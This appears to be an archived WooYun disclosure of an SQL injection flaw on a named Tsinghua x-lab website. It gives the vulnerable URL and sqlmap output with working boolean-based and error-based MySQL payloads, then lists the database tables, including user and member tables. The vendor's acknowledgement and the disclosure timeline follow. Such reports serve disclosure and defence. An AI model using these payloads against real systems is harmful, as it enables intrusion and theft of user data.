乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-27: 细节已通知厂商并且等待厂商处理中 2015-11-27: 厂商已经确认,细节仅向厂商公开 2015-12-07: 细节向核心白帽子及相关领域专家公开 2015-12-17: 细节向普通白帽子公开 2015-12-27: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
http://www.x-lab.tsinghua.edu.cn/?a=projectshow&c=nurture&id=229
sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: a=projectshow&c=nurture&id=229 AND 8585=8585 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: a=projectshow&c=nurture&id=229 AND (SELECT 4122 FROM(SELECT COUNT(*),CONCAT(0x716b6b6271,(SELECT (ELT(4122=4122,1))),0x7178717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)---web application technology: Apacheback-end DBMS: MySQL 5.0Database: x-lab+----------------------------+---------+| Table | Entries |+----------------------------+---------+| zcn_partner | 7654 || zcn_users_log | 6164 || zcn_cirf | 4364 || zcn_bm | 3529 || zcn_mailinglist | 2420 || zcn_eir_time | 2248 || zcn_members | 1612 | //用户| zcn_project | 892 || zcn_bangzu | 775 || zcn_eir_yy | 329 || zcn_place | 274 || zcn_stat_active | 264 || zcn_project_receive | 257 || zcn_project_cup | 254 || zcn_companies_registry | 214 || zcn_voice | 213 || zcn_cirf_class | 194 || zcn_newslettercon | 167 || zcn_zt | 164 || zcn_eir_addtime | 155 || zcn_project_excellent | 137 || zcn_top10 | 133 || zcn_type_list | 121 || zcn_message | 119 || zcn_train | 116 || zcn_eir | 101 || zcn_zwxx | 48 || zcn_zhaomu | 44 || zcn_links | 38 || zcn_hr | 37 || zcn_menus | 36 || zcn_type_class | 35 || zcn_slider | 29 || zcn_president_cup_activity | 27 || zcn_project_assess | 23 || zcn_users | 20 || zcn_video | 20 || zcn_zwxx_class | 20 || zcn_newsletter | 18 || zcn_president_cup | 17 || zcn_advice | 14 || zcn_articles | 13 || zcn_mail_template | 12 || zcn_email_queue | 10 || zcn_fuwu | 10 || zcn_kcxx | 9 || zcn_project_class | 9 || zcn_cm_cd | 8 || zcn_gzf | 5 || zcn_users_class | 5 || zcn_video_class | 5 || zcn_kcxx_class | 4 || zcn_links_class | 4 || zcn_xmxx | 4 || zcn_about | 3 || zcn_adflash | 3 || zcn_articles_class | 3 || zcn_cm_grp_cd | 3 || zcn_project_story | 3 || zcn_member_video_comment | 1 || zcn_network | 1 |+----------------------------+---------+
危害等级:高
漏洞Rank:16
确认时间:2015-11-27 15:04
谢谢提醒,我们会尽快修改的。
暂无